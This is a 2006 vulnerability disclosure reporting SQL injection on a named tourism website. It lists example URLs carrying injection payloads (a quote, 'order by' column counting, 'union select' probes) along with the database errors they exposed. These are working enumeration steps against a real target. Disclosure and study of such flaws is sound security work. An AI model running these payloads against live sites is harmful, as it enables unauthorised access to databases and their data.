|
Vulnerable Page: http://www.incredibleindia.org/newsite/cms_Page.asp
Found By: Susam Pal
Found On: 29th March, 2006, Wednesday
Vulnerability Type: SQL Injection
Action Taken: Reported to admin@incredibleindia.org
Description:
www.incredibleindia.org is a tourism website. The site is prone to SQL injection which can be exploited to reveal the table
names, some column names as well as their data types. Exploiting the vulnerability requires some reverse engineering. The ASP
ODBC error messages can be displayed by passing bad values for the parameters in the URL.
Example URL 1: http://www.incredibleindia.org/newsite/cms_Page.asp?PageID=828'
Error Found: Unclosed quotation mark before the character string ' and mncpage.mnccategoryid = mnccategory.mnccategoryid'.
Conclusion: Direct SQL Injection is possible. There are 2 tables, 'mncpage' and 'mnccategory'. Both of them have a column
called 'mnccategoryid'.
Example URL 2: http://www.incredibleindia.org/newsite/cms_Page.asp?PageID=828 order by 1--
Example URL 3: http://www.incredibleindia.org/newsite/cms_Page.asp?PageID=828 order by 2--
Example URL 4: http://www.incredibleindia.org/newsite/cms_Page.asp?PageID=828 order by 3--
Error Found: None
Example URL 5: http://www.incredibleindia.org/newsite/cms_Page.asp?PageID=828 order by 4--
Error Found: The ORDER BY position number 4 is out of range of the number of items in the select list.
Conclusion: The table being used by the query selects 3 columns and one of them is an integer.
Example URL 6: http://www.incredibleindia.org/newsite/cms_Page.asp?PageID=828 union select 'varchar1', 'varchar2', 'varchar3'
from mncpage--
Error Found: Syntax error converting the varchar value 'varchar1' to a column of data type int.
Conclusion: The 1st column in the select query is an integer.
Error URL 7: http://www.incredibleindia.org/newsite/cms_Page.asp?PageID=828 union select mnccategoryid, 'varchar2',
'varchar3' from mncpage--
Error Found: None
Conclusion: The column 'mnccategory' is of integer type.